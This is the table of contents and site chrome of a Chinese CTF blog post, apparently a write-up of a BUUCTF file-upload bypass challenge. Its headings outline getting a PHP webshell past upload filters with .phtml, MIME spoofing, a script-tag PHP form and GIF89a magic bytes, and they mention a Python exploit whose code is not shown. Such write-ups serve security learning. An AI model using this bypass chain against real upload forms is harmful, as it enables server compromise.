          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#BUUCTF-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E7%BB%95%E8%BF%87%E5%AE%9E%E6%88%98-%E4%B8%8A%E4%BC%A0%E5%A4%B4%E5%83%8F-DeepSeek-WriteUp"><span class="nav-number">1.</span> <span class="nav-text">BUUCTF - 文件上传绕过实战 (上传头像) - DeepSeek WriteUp</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E4%BF%A1%E6%81%AF"><span class="nav-number">1.1.</span> <span class="nav-text">题目信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E5%88%86%E6%9E%90"><span class="nav-number">1.2.</span> <span class="nav-text">题目分析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B5%8B%E8%AF%95-1%EF%BC%9A%E7%9B%B4%E6%8E%A5%E4%B8%8A%E4%BC%A0-PHP-%E6%96%87%E4%BB%B6-%E2%86%92-%E5%8F%91%E7%8E%B0%E6%89%A9%E5%B1%95%E5%90%8D%E6%A3%80%E6%B5%8B"><span class="nav-number">1.2.1.</span> <span class="nav-text">测试 1：直接上传 PHP 文件 → 发现扩展名检测</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B5%8B%E8%AF%95-2%EF%BC%9A%E5%AF%B9%E6%AF%94%E4%B8%8D%E5%90%8C%E6%89%A9%E5%B1%95%E5%90%8D%EF%BC%8C%E5%AE%9A%E4%BD%8D%E7%AC%AC%E4%B8%80%E9%81%93%E9%98%B2%E7%BA%BF-%E2%86%92-%E5%8F%91%E7%8E%B0-MIME-%E7%B1%BB%E5%9E%8B%E6%A3%80%E6%B5%8B"><span class="nav-number">1.2.2.</span> <span class="nav-text">测试 2：对比不同扩展名，定位第一道防线 → 发现 MIME 类型检测</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B5%8B%E8%AF%95-3%EF%BC%9A%E7%BB%95%E8%BF%87-MIME-%E7%B1%BB%E5%9E%8B%EF%BC%8C%E8%A7%A6%E5%8F%91%E5%86%85%E5%AE%B9%E6%A3%80%E6%B5%8B-%E2%86%92-%E5%8F%91%E7%8E%B0"><span class="nav-number">1.2.3.</span> <span class="nav-text">测试 3：绕过 MIME 类型，触发内容检测 → 发现 &lt;? 过滤</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B5%8B%E8%AF%95-4%EF%BC%9A%E4%BD%BF%E7%94%A8-%E7%BB%95%E8%BF%87"><span class="nav-number">1.2.4.</span> <span class="nav-text">测试 4：使用 &lt;script language&#x3D;&quot;php&quot;&gt; 绕过 &lt;? 过滤 → 发现 Magic Bytes 检测</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%B5%8B%E8%AF%95-5%EF%BC%9A%E6%9C%80%E7%BB%88%E7%BB%95%E8%BF%87-%E2%80%94-GIF89a-phtml-MIME-script%E6%A0%87%E7%AD%BE"><span class="nav-number">1.2.5.</span> <span class="nav-text">测试 5：最终绕过 — GIF89a + .phtml + MIME + script标签</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%9D%E5%A4%96%E6%AD%A5%E9%AA%A4%EF%BC%9A%E5%AE%9A%E4%BD%8D%E4%B8%8A%E4%BC%A0%E7%9B%AE%E5%BD%95"><span class="nav-number">1.2.6.</span> <span class="nav-text">额外步骤：定位上传目录</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BB%95%E8%BF%87%E6%9D%A1%E4%BB%B6%E6%B1%87%E6%80%BB"><span class="nav-number">1.3.</span> <span class="nav-text">绕过条件汇总</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploit-%E8%BF%87%E7%A8%8B"><span class="nav-number">1.4.</span> <span class="nav-text">Exploit 过程</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E6%AD%A5%EF%BC%9A%E6%9E%84%E9%80%A0-Payload-%E5%B9%B6%E4%B8%8A%E4%BC%A0"><span class="nav-number">1.4.1.</span> <span class="nav-text">第一步：构造 Payload 并上传</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%AC%AC%E4%BA%8C%E6%AD%A5%EF%BC%9A%E8%AE%BF%E9%97%AE-Webshell-%E8%8E%B7%E5%8F%96-Flag"><span class="nav-number">1.4.2.</span> <span class="nav-text">第二步：访问 Webshell 获取 Flag</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Python-Exploit-%E7%89%88%E6%9C%AC"><span class="nav-number">1.5.</span> <span class="nav-text">Python Exploit 版本</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9B%B8%E5%85%B3%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93"><span class="nav-number">1.6.</span> <span class="nav-text">相关知识点总结</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-MIME-%E6%A0%A1%E9%AA%8C%E7%9A%84%E8%84%86%E5%BC%B1%E6%80%A7"><span class="nav-number">1.6.1.</span> <span class="nav-text">1. MIME 校验的脆弱性</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E6%89%A9%E5%B1%95%E5%90%8D%E9%BB%91%E5%90%8D%E5%8D%95%E6%9C%BA%E5%88%B6%E7%9A%84%E7%BC%BA%E9%99%B7"><span class="nav-number">1.6.2.</span> <span class="nav-text">2. 扩展名黑名单机制的缺陷</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-PHP-%E5%85%B6%E4%BB%96%E6%A0%87%E7%AD%BE%E8%AF%AD%E6%B3%95"><span class="nav-number">1.6.3.</span> <span class="nav-text">3. PHP 其他标签语法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-Magic-Bytes-%E4%BC%AA%E9%80%A0"><span class="nav-number">1.6.4.</span> <span class="nav-text">4. Magic Bytes 伪造</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-Nginx-Apache-%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86%E6%9E%B6%E6%9E%84"><span class="nav-number">1.6.5.</span> <span class="nav-text">5. Nginx + Apache 反向代理架构</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83"><span class="nav-number">1.7.</span> <span class="nav-text">参考</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="zhaochoudecat"
      src="/images/saber.jpg">
  <p class="site-author-name" itemprop="name">zhaochoudecat</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">33</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zhaochoudecat</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
